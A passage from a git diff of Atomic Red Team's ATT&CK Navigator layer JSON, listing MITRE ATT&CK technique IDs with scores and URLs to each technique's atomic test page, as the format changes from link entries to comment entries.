Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]}]} \ No newline at end of file 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index cd0528ba..03281866 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.
md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://g
